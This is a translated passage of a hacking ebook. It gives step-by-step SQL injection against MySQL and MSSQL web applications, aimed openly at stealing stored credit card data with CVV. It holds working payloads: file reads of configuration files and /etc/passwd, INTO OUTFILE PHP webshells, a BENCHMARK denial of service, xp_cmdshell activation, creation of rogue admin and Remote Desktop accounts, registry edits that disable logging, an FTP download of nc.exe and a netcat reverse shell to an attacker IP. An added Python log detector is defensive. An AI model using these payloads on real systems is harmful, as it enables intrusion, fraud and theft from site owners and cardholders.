You can get the database name with:
0 UNION SELECT database(),null/*
If we are lucky we get to see warnings from mysql_result(), mysql_free_result(), mysql_fetch_row() or similar functions. These warnings show the path to the web directory, which makes it easy to decide where to write the file. They look like this:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/shop/shopping2/list1.html on line 80.
To provoke this warning you can try the statement 0 AND 1=0
The above works for most websites, but if MySQL error messages are turned off you can try to guess the web directory by using LOAD_FILE() to read configuration files. Some default paths of configuration files:
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
Also pay attention to whether the web server's OS is *nix or Windows, so that you guess well.
The web root directory is usually at:
/var/www/html/
/var/www/web1/html/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
/var/www/vhosts/sitename/httpdocs/

You can google for more. Generally you can write files into any directory the MySQL server has write access to, as long as you have the FILE privilege. However the admin can restrict the directories that can be written to (the secure_file_priv option). See http://dev.mysql.com/doc/refman/5.1/s-options.html
Now that we have looked into all this, let's load_file config.php on the site we have been trying to root:
The whole path is converted to ASCII codes. Note that the CHAR() list below actually decodes to C:\ProgramFiles\MySQL\MySQLServer5.0\Data\config.php (the Data directory found above, with the spaces lost), not to the C:/Program Files/Web/config.php that the original text names:
char(67,58,92,80,114,111,103,114,97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,76,83,101,114,118,101,114,53,46,48,92,68,97,116,97,92,99,111,110,102,105,103,46,112,104,112)
Now let's try (note: user=muu is also converted to ASCII codes, muu = CHAR(109, 117, 117)):
union all select 1,2,3,load_file(char(67,58,92,80,114,111,103,114,97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,76,83,101,114,118,101,114,53,46,48,92,68,97,116,97,92,99,111,110,102,105,103,46,112,104,112)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from mysql.user where user=CHAR(109, 117, 117)
Impressive result: (screenshot in the original)

Now let's try the username and password from that file to connect to the database server; here we use MySQL Query Browser to connect, which you can find via google.com:
Result (connected successfully; let's see whether this shop has many CCs): (screenshot in the original)

Looking at the picture, tblcart_payment is likely to hold the CC information.
Getting root on the MySQL server feels great: you can do just about anything, Drop, Update, Delete or Insert data ... Luckily the MySQL user and pass were the same as for WHM (cPanel root), as in the picture below:

Check whether this shop has CC (look at how high the IDs go; this shop is probably good, and it even has CVV):
The result is what Hieupc predicted: (screenshot in the original)


Experience:
We can also use load_file to view /etc/passwd. Example:
union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)
Result (note: remember to convert both /etc/passwd and user=muu to ASCII codes): (screenshot in the original)

We can also view /etc/shadow if we hold root (the file is readable only by root, so mysqld has to be running as root for this). With the shadow hashes in hand you have full control of the server; crack them with John the Ripper (john171d), which you can download via google.com.
Another thing is that we can change existing information with the Update statement.
Example (don't forget to convert strings to ASCII codes, like muu):
update table_name set column_name='new value' where column_name='value' (for instance where user=muu)

If you have the FILE privilege, upload a backdoor as follows:
Once you are sure you have FILE and have found the directory to write to, you can write with this SQL statement:
0 UNION SELECT columnname,null FROM tablename INTO OUTFILE '../../web/dir/file.txt'
Or write out arbitrary data when we do not know any table or column names:
1 OR 1=1 INTO OUTFILE '../../web/dir/file.txt'
If you want to avoid the splitting characters in the data, use INTO DUMPFILE instead of INTO OUTFILE
You can also combine this with load_file() to copy files on the server:
0 AND 1=0 UNION SELECT load_file() INTO OUTFILE
In some cases we need hex and unhex:
0 AND 1=0 UNION SELECT hex(load_file()) INTO OUTFILE
(the file name arguments are left out in the original)
Or you can write anything you like into the file, such as a webshell:
0 AND 1=0 UNION SELECT '<? include("$hieupc"); ?>',null INTO OUTFILE '../../web/server/dir/hieupc.php'
Here are a few examples:
// PHP SHELL
<? system($_GET['c']); ?>
<?php system($_GET['cmd']); ?>
or passthru() if you prefer:
// webserver info
<? phpinfo(); ?>
// SQL QUERY
<? $result = mysql_query($_GET['query']); ?>
Finally, a few notes about this kind of exploitation:
- This statement cannot overwrite an existing file.
- INTO OUTFILE must be the last clause in the query. Also, the code you want to write into the file can be encoded by converting it to CHAR()/hex.
Uploading a shell is the most important part of exploiting MySQL. Equally important, we have to pass in extra variables or parameters, numbers for instance; they help us run some statements that are restricted in MySQL.
Example: -1 union select 1,2,user,pass,5,6 from users limit 5,3/*
(limit 5,3 returns three rows starting from the sixth)

Sometimes we run into a filtering or encoding mechanism in MySQL. To get rid of it we need another statement of no less importance:
http://www.site.ru/index.php?page=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),4,5,6/*
(AES_DECRYPT(AES_ENCRYPT(x,k),k) returns x unchanged as a binary string, so the value passes through as-is while the expression looks different to a filter.)
Sometimes our use of spaces is restricted. To get around that we use the following forms:
http://www.site.ru/index.php?page=-1+union+select+1,2,user,password,5,6+from+mysql.user/*
http://www.site.ru/index.php?page=-1/**/union/**/select/**/1,2,user,...
Finally, DoS. Everyone probably understands this statement:
http://www.site.ru/index.php?page=-1+BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date)))
Page 24
Ebook Hacking Credit Card Version 4 - Hieupc
2. Ky thut chim quyn Admin qua SA MSSQL Server:
Sau y la mt vi d thc t v chim quyn Admin qua SA ma hieupc thc hin trn 1 server
VN ma co ui la: GOV.VN (hieupc xin gi kin site nay vi tranh site bi pha hoai). Thng
thng li nh sau la ban co th chim quyn Admin mt cach d dang nu Server xai quyn SA
hoc la mt user co ngang quyn SA chng han. check xem co li hay khng thi thm du .
Vi d:


Let's check the system information. We use the following query to gather it all at once. Example:
http://www.hieupc.gov.vn/hieupc.asp?id=1/**/and/**/1=convert%28int,@@servername%2bchar(124)%2bdb_name()%2bchar(124)%2bsystem_user%2bchar(124)%2b@@version)--sp_password
Result:

Check whether the current System_User has SA-equivalent rights:

Sometimes a System_user has SA-equivalent rights, but when we query it the name isn't 'SA', so it is usually overlooked...

There is a way to check whether that System_user is in the sysadmin role (equivalent to SA).

Example victim:
www.hieupc.gov.vn/hieupc.asp?id=1
Check System_User
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,system_user)--sp_password
Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'hieupc' to a
column of data type int.
So the System_user this server runs as is named hieupc. Now let's check whether hieupc has SA-equivalent rights:
www.hieupc.gov.vn/hieupc.asp?id=1;drop table check_sysuser create table check_sysuser (id int identity,noi_dung
varchar(1000)) insert into check_sysuser select sysadmin from master..syslogins where name ='hieupc'--
sp_password
===> this creates a table named check_sysuser and inserts the output of the query select sysadmin from master..syslogins where name ='hieupc' into its noi_dung column...
http://www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung%2b'/' from check_sysuser
where id=1))--sp_password
===> selects the value of the noi_dung column; note that %2b means the + sign.
Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '1/ ' to a column of
data type int.
===> meaning the SQL account hieupc has SA-equivalent rights. In this article, the server Hieupc is hacking runs as an SA-level user.

If the error reads like this instead:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '0/ ' to a column of
data type int.
===> then the SQL account hieupc does not have SA-equivalent rights, and we can only extract information the ordinary way.
Now what do we do with SA rights in hand?
Enable xp_cmdshell on SQL Server 2005

- As you know, MSSQL Server 2005 disables xp_cmdshell by default, meaning that even with the "SA" SQL account we cannot run CMD commands:

+ Example victim:
www.hieupc.gov.vn/hieupc.asp?id=1
(This site's system_user is SA as well.) When we try the following CMD command:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ipconfig /all'--sp_password

The response comes back with no error at all.
But since we have "SA", we can still enable it by using sp_configure:
www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_configure 'show advanced options', 1--sp_password
===> this turns on show advanced options, which must be on before xp_cmdshell can be enabled (xp_cmdshell is one of those options)... If it reports no error and returns the page:
www.hieupc.gov.vn/hieupc.asp?id=1
then it succeeded. Continue exploiting:
http://www.hieupc.gov.vn/hieupc.asp?id=1;reconfigure--sp_password
===> this reconfigure applies the show advanced options setting... If it reports no error and returns the page:
www.hieupc.gov.vn/hieupc.asp?id=1
then it succeeded. Continue exploiting:
www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_configure 'xp_cmdshell', 1--sp_password
===> this enables xp_cmdshell... If it reports no error and returns the page:
www.hieupc.gov.vn/hieupc.asp?id=1
then it succeeded. Continue exploiting with reconfigure once more:
http://www.hieupc.gov.vn/hieupc.asp?id=1;reconfigure--sp_password
===> this reconfigure applies the xp_cmdshell setting

After enabling xp_cmdshell, let's try ipconfig /all:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ipconfig /all'--sp_password


Result returned:


Note: even with xp_cmdshell enabled, you may not be able to do much on the server, because MSSQL Server 2005 won't run commands such as "net user hieupc 123456 /add"; even activating the Guest account with "net user Guest /active" has no effect.

Add a user to MSSQL Server:

The victim is still
www.hieupc.gov.vn/hieupc.asp?id=1

Why add a user to SQL Server? So that we can log in to their MSSQL Server with Query Analyzer in Microsoft SQL Server, where writing queries is faster and easier (and it's good practice too). Alternatively, RazorSQL connect can be used.

First, create the user:
www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_addlogin 'hieupc', '123456'--sp_password
===> we just created a user in their SQL Server with username hieupc and password 123456. If it reports no error and returns the page:
www.hieupc.gov.vn/hieupc.asp?id=1
then it succeeded. Once the user exists, we must add it to the highest administrative role (SA-equivalent):
www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_addsrvrolemember 'hieupc', 'sysadmin'--sp_password
If it reports no error and returns the page:
www.hieupc.gov.vn/hieupc.asp?id=1
then it succeeded.

Now use Query Analyzer or RazorSQL connect to log in and see (this only applies to MSSQL servers that allow remote connections; some servers block remote MSSQL access).
Result:

Once you are here, you can do a lot of interesting things.
Take over Admin and Remote Desktop as follows:
Use the following CMD command to add a Windows user with username = hieupc and password = 123456:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net user hieupc 123456 /add'--sp_password
A result like the following means success:

To add user hieupc to the administrators group, do the following:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net localgroup administrators hieupc /add'--
sp_password
A result like the following means success:

Now add user hieupc to the Remote Desktop Users group so it is allowed to use Remote Desktop:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net localgroup "Remote Desktop Users" hieupc
/add'--sp_password
A result like the following means success:

So now you have an extra admin account with password 123456, with system rights and the ability to remote desktop.
Open Remote Desktop as follows:
(Start->programs->accessories->communications->Remote Desktop)
Or go to Run and type "mstsc"

Now just enter the IP or domain name (www.hieupc.gov.vn) and the username and password to log in to the server and do whatever you want.
Result: remote desktop into the server:

How to upload a backdoor to the server with SA rights:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo open ftp.Your_Domain.com>ftp&echo user
Your_User Your_Pass>>ftp&echo get Your_File>>ftp&echo quit>>ftp'--sp_password

===> creates a batch file containing the FTP commands
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ftp -v -i -n -s:ftp'--sp_password
===> runs the commands in the batch file

ftp.Your_Domain.com : this is your domain, e.g. ftp.hieupc.com

Your_User : the username for logging in to FTP

Your_Pass : the password for logging in to FTP

Your_File : the file you want to upload to the server (it must be on your FTP host), e.g. nc.exe

For example, if you have an FTP host ftp.hieupc.com with username hieupc and password 123456, and you want to upload nc.exe from that FTP host to the server, you do:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo open ftp.hieupc.com>ftp&echo user hieupc
hieupcpass>>ftp&echo get nc.exe>>ftp&echo quit>>ftp'--sp_password

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ftp -v -i -n -s:ftp'--sp_password
After that runs, you can check whether the file reached the server as follows:
www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung varchar(1000))
insert into hieupc exec master..xp_cmdshell 'dir Your_File'--sp_password
===> creates a table holding the output of exec master..xp_cmdshell 'dir Your_File'; remember Your_File = the name of the file you just uploaded, e.g. nc.exe...
Let's view the contents:
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select noi_dung from hieupc where id=6))--sp_password
Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '06/23/2007 04:56
PM 579 nc.exe' to a column of data type int
===> upload succeeded.

What to do when we cannot Remote Desktop into the server:
Sometimes we already have the username and password, but remote desktop doesn't work because a firewall blocks it or the server has turned this feature off.

Here is the solution:
The demo site is still:
www.hieupc.gov.vn/hieupc.asp?id=1

As you know, the Registry (also called Regedit) is very important in Windows; with system_user = 'SA' in hand you can interact with the server's registry. So we go into the registry to enable a few things:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\Terminal
Server','fDenyTSConnections',REG_DWORD,0--sp_password
===> writes the registry value fDenyTSConnections with value = 0

Next command:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\Terminal
Server','AllowTSConnections',REG_DWORD,1--sp_password
===> writes the registry value AllowTSConnections with value = 1
Then:
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,@@servername)--sp_password
===> gets the server name, which is needed for the restart.
And use the following command to restart the machine (tn_server = the server name): 'shutdown -m \\tn_server r t 5'
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'shutdown -m \\tn_server r t 5'--sp_password
===> restarts their machine.



A few things to note:
Delete a registry key as follows:
www.hieupc.gov.vn/hieupc.asp?id=1;exec xp_regdeletekey 'rootkey', 'key'--sp_password
===> note that 'rootkey' and 'key' form the path to that registry key...

For example, if hieupc wants to delete the registry key TestValue under 'HKEY_LOCAL_MACHINE\SOFTWARE\Test', it is:
www.hieupc.gov.vn/hieupc.asp?id=1;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Test\TestValue'--sp_password

Read a registry value as follows:

For example, if you want to read the registry value fDenyTSConnections under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server to see what it is set to, first run the query:
www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung1 varchar(99),
noi_dung2 varchar(99)) insert into hieupc EXEC master..xp_regread
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'--
sp_password
===> creates a table that stores that registry value

Then select the data out of it to view:
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung1%2b'/'%2bnoi_dung2 from hieupc
where id=1))--sp_password
===> %2b = the + sign

If it shows the error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value
'fDenyTSConnections/0' to a column of data type int.
===> it means the value fDenyTSConnections is 0

Write and modify a registry value as follows:

For example, Hieupc will change the value of fDenyTSConnections under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server to 1:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\Terminal
Server','fDenyTSConnections',REG_DWORD,1--sp_password
A few notes about Remote Desktop:

When you have SA and have successfully added an Admin account, but connecting to the server's Remote Desktop still fails, what next?
Now we must enable the Terminal Service with:
Sc config TermService start= auto
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'Sc config TermService start= auto'--
sp_password
After enabling it, we must start TermService:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net start TermService'--sp_password

Open the Remote Desktop port in the firewall:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'netsh firewall add portopening TCP
3389 Remote Desktop'--sp_password
Now try connecting to the server over Remote Desktop.
You can also run the following commands if you still cannot connect to Remote Desktop:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'netsh firewall set service remoteadmin
enable'--sp_password

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'netsh firewall set service remotedesktop
enable'--sp_password
Additional note:
Usually a server doesn't have a firewall turned on (if there is one, it's usually a hardware firewall), but what if the server does have the firewall on and it blocks your connecting application (Remote Desktop, for instance, or netcat)? Then refer to the following:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'netsh firewall set opmode enable disable'--
sp_password



If it is enabled but the MSSQL Server's IP differs from the IP of the server hosting the web site, do the following:
You need to find the exact IP of the MSSQL Server
www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung varchar(1000))
insert into hieupc exec master..xp_cmdshell 'ipconfig'--sp_password
===> creates a table storing the output of ipconfig
Then
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select noi_dung from hieupc where id=8))--sp_password
Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'IP Address. . . . . . . .
. . . . : xxx.xxx.x.xxx' to a column of data type int.
==> xxx.xxx.x.xxx is the IP of the MSSQL Server.
So you have the MSSQL IP, but what if it's a LAN address? Then you have to use netcat: upload netcat to the server and connect from the server back to your machine. First upload the netcat file to an FTP host of your own (this was covered above, see the details there):
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo open ftp.your-host.com>>ftp'--sp_password
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo user your-ftp-username your-ftp-pass>>ftp'--
sp_password
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo get nc.exe>>ftp'--sp_password
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo quit>>ftp'--sp_password
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ftp -v -i -n -s:ftp'--sp_password
Now copy netcat (nc.exe) into your own C:\, open cmd and type cd\ to move to C:\
then type nc -l -p 1787 -vv
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'nc.exe -e cmd.exe -d your-ip 1787'--sp_password
or
www.hieupc.gov.vn/hieupc.asp?id=1;select%20*%20from%20openrowset('sqloledb','server=BACKUP;uid=BUILTIN\Administrators;pwd=','set%20fmtonly%20off%20select%201%20exec%20master..xp_cmdshell%20"nc.exe -e
cmd.exe -d 58.187.32.40 1787"')--sp_password
58.187.32.40 or your ip : this is your own IP address; you can look up your IP address at ip2location.com

Note: If the NC connection succeeds, you essentially have remote access to the server and can do whatever you like.

What if the server changed the Remote Desktop port:
www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung1 varchar(99),
noi_dung2 varchar(99)) insert into hieupc EXEC master..xp_regread
'HKEY_LOCAL_MACHINE','System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\','PortNumber'--sp_password
Query for the result
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung1%2b'/'%2bnoi_dung2 from hieupc
where id=1))--sp_password
Result returned:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'PortNumber/xxxx'
to a column of data type int.
===> if xxxx is not 3389, then xxxx is the new Remote Desktop port the server switched to (3389 is the default Remote Desktop port).
So when you connect to the server you must append xxxx after the server's IP.
What if the user is not SA:
Why do we need to put Guest into the Database Owner of the Master database?
Because only the DB Owner of the Master DB has the right to execute xp_regwrite, xp_regdeletevalue and xp_cmdshell.
Why does Guest need the commands xp_regwrite, xp_regdeletevalue and xp_cmdshell?
Because:
xp_regwrite is used to write to the Windows Registry
xp_regdeletevalue is used to delete data from the Windows Registry
xp_cmdshell is used to send commands to Windows, for privilege escalation, takeover, installing backdoors, and so on
Here is the command that puts Guest into the Db Owner of the Master Db:
http://www.victim.com/index.asp?id=1;exec sp_executesql N'create view dbo.test as select * from
master.dbo.sysusers'exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec
sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''Guest''','xx' exec sp_executesql N'drop
view dbo.test'--sp_password

If you run the link above and it reports no error and returns the page:
http://www.victim.com/index.asp?id=1

then you have successfully put Guest into the Db Owner of the Master Db, but to be safe, check once more as follows:
http://www.victim.com/index.asp?id=1%20%20and%201=convert(int,(select%20top%201%20name%20from%20master..sysusers%20where%20roles=0x01%20and%20name%20not%20in('dbo')))--sp_password

Done, now you can freely run xp_regwrite as well as xp_cmdshell
Now that xp_regwrite, xp_regdeletevalue and xp_cmdshell can be run, what do we do?
Now log in to the Database with user BUILTIN\ADMINISTRATOR and password = "xx":
http://www.victim.com/index.asp?id=1;exec%20sp_executesql%20N'create%20view%20dbo.test%20as%20select%20*%20from%20master.dbo.sysxlogins'%20exec%20sp_msdropretry%20'xx%20update%20sysusers%20set%20sid=0x01%20where%20name=''dbo''','xx'%20exec%20sp_msdropretry%20'xx%20update%20dbo.test%20set%20xstatus=18%20where%20name=''BUILTIN\ADMINISTRATORS''','xx'%20exec%20sp_executesql%20N'drop%20view%20dbo.test'--sp_password
So we have a user planted in the server's DB... From now on, every command goes through this user.
Now I use xp_regwrite to enable OpenRowset, which that SysAdmin disabled.
http://www.victim.com/index.asp?id=1;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1--sp_password

http://www.victim.com/index.asp?id=1;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0--sp_password

Note the parts in bold:
1 : Enable
0 : Disable
If it returns the home page after running, it succeeded; no need to check.
Now try xp_regdeletevalue to disable Windows' logging and data-filtering feature
http://www.victim.com/index.asp?id=1;exec master..xp_regdeletevalue
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'--
sp_password

Now you don't have to worry about being logged, which is why I could drop the sp_password part; leaving it in does no harm either.
Now it's time to turn on xp_cmdshell. Note that the step above permits running xp_cmdshell, while this one turns on xp_cmdshell and allow updates.
http://www.victim.com/index.asp?id=1;select * from openrowset('sqloledb',
'server=BACKUP;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc
xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--sp_password
At this point we are halfway there; continue exploiting with the methods presented above.
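Every request in this MSSQL chain, and the MySQL INTO OUTFILE and /**/ padding tricks from the previous section, leaves a distinctive shape in the web server's access log. The following is an added example of detection logic for those shapes; it is not code from the ebook or its author. It assumes the common combined log format, the log lines are constructed for the demonstration, and the marker names and the high/medium split are my own choice.

```python
"""Flag the request shapes this chapter walks through (stacked ;exec calls to
xp_cmdshell / sp_configure / xp_reg*, error-based convert(int, ...), MySQL
UNION ... INTO OUTFILE, /**/ padding, the --sp_password suffix) in web-server
access logs.  Added example, not code from the ebook; all log lines below are
constructed for the demonstration."""
import re
from urllib.parse import unquote_plus

# One regex per technique named in the text; the names are my own labels.
MARKERS = {
    "stacked_exec": re.compile(r";\s*exec\b", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "sp_configure": re.compile(r"\bsp_configure\b", re.I),
    "registry_xp": re.compile(r"\bxp_reg(?:write|read|deletekey|deletevalue)\b", re.I),
    "login_or_role": re.compile(r"\bsp_add(?:login|srvrolemember)\b", re.I),
    "openrowset": re.compile(r"\bopenrowset\s*\(", re.I),
    "error_based_convert": re.compile(r"\bconvert\s*\(\s*int\b", re.I),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "sp_password_suffix": re.compile(r"--\s*sp_password\b", re.I),
}
# Markers that on their own mean command execution, persistence or a file write.
HIGH = {"xp_cmdshell", "registry_xp", "login_or_role", "openrowset", "into_outfile"}

# Combined log format: client ident user [time] "METHOD URL PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(url: str) -> str:
    """URL-decode twice (catches %2520-style double encoding) and replace /**/
    comment padding, the whitespace substitute used in the text, with spaces."""
    text = unquote_plus(unquote_plus(url))
    return re.sub(r"/\*.*?\*/", " ", text)


def scan_line(line: str):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    text = normalize(m.group("url"))
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(text))
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "severity": "high" if HIGH & set(hits) else "medium",
        "markers": hits,
        "decoded": text,
    }


def scan(lines):
    """One finding per suspicious line; benign lines produce nothing."""
    return [f for f in (scan_line(line) for line in lines) if f]


SAMPLE_LOG = [  # constructed sample lines, modelled on the chapter's requests
    '10.0.0.5 - - [10/Sep/2009:10:00:01 +0700] "GET /hieupc.asp?id=1;exec%20master..xp_cmdshell%20%27ipconfig%20/all%27--sp_password HTTP/1.1" 500 1421',
    '10.0.0.5 - - [10/Sep/2009:10:00:09 +0700] "GET /hieupc.asp?id=1%20and%201=convert(int,system_user)--sp_password HTTP/1.1" 500 1388',
    '10.0.0.5 - - [10/Sep/2009:10:01:30 +0700] "GET /hieupc.asp?id=1;exec%20sp_configure%20%27xp_cmdshell%27,%201--sp_password HTTP/1.1" 200 5120',
    '10.0.0.7 - - [10/Sep/2009:10:02:00 +0700] "GET /index.php?page=-1/**/union/**/select/**/1,2,3 HTTP/1.1" 200 2048',
    '10.0.0.7 - - [10/Sep/2009:10:02:05 +0700] "GET /index.php?page=0%20AND%201=0%20UNION%20SELECT%20%27x%27,null%20INTO%20OUTFILE%20%27/var/www/html/s.php%27 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [10/Sep/2009:10:03:00 +0700] "GET /products.asp?id=42 HTTP/1.1" 200 7310',
    '10.0.0.9 - - [10/Sep/2009:10:03:02 +0700] "GET /search.asp?q=select+a+union HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:10} {f['status']} {f['markers']}")
```

The decoding step matters more than the regex list: the chapter's requests arrive with %20, %27 and /**/ in place of spaces and quotes, so a rule that matches the raw URL misses them, while matching the normalized form catches the same query however it was padded.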






3. What you need to know about Localhack:
Hieupc knows that by now local hacking is probably familiar to everyone and the method is fairly simple; there are also plenty of tricks for exploiting it. Today Hieupc includes the article below in this ebook only as a reference and to share Hieupc's experience with local hacking, so as you read, feel free to add your own opinions if anything is wrong or missing. Many thanks.
Local hack and how to prevent it (Author: Pham Duc Hai):
This article is written so that administrators and people doing security understand the local hack attack more clearly. Although this method has been common for a long time, I think that not only in Vietnam but on many foreign servers this flaw still exists, and sometimes a new bug appears that makes it usable again. I also believe many of you know how to attack locally but don't know how to fix this flaw.
What is local hack:
Simply put, it is a local attack. Local here means on the same server. How is this attack carried out?
For example, we want to attack the target site www.site1.com, but after analysing the situation we find that attacking this site directly is very hard. Through surveying we also learn that there are many other sites on this server. Idea: attack another site on the same server, then use that site as a stepping stone to attack the target site.
What types of local hack are there? I tentatively divide them into 3 types: Unix local, Windows local, FTP local. Perhaps many of you only know local hack on Unix and not the other two. Unix local means the server is Unix, likewise for Windows local, and FTP local means local via FTP.
The part common to all of these is step 1, finding the sites on the same server. The common term for this is Reverse IP. We can use the following tools to identify sites on the same server:
http://www.domaintools.com/reverse-ip/ --> this one now charges a fee
http://www.ip-adress.com/reverse_ip/ this one is free and works well
http://www.seologs.com/ip-domains.html -> this one has the advantage of holding many Vietnamese domain names, but fewer than the site above
After the step above comes the step of finding a vulnerable site to use as a stepping stone. Here the types diverge. I will present each part separately.
Unix local:
Probably only php-mysql sites on Unix are common now, so I will focus on that. The search for bugs follows this line of thinking:
- If the site uses an identifiable codebase, e.g. open source, first go to bug-advisory sites to check whether the version in use has any known bug. You can go to http://milw0rm.com/ or http://www.securityfocus.com/ ... to find bugs.
- If the step above fails, or they developed the code themselves, the only way is to probe it yourself. At this point it mostly comes down to the hacker's experience and ability. Flaws that are commonly used and fairly easy to find: SQL injection, PHP file include, default-install flaws in applications such as editors, file upload without authentication, upload without filtering, or filtering + apache unknown extension,... many flaws can be exploited. I won't go into detail on how these flaws are used and exploited.
After finding a flaw, the goal is to upload a shell so the next step can proceed. Whether a shell can be uploaded depends a lot on whether that site's admin set CHMOD properly. I will assume a shell has been uploaded. Now we start trying to go local to the target site.
If Safe mode is OFF and local access is easy there is nothing to discuss; the target site can already be penetrated.
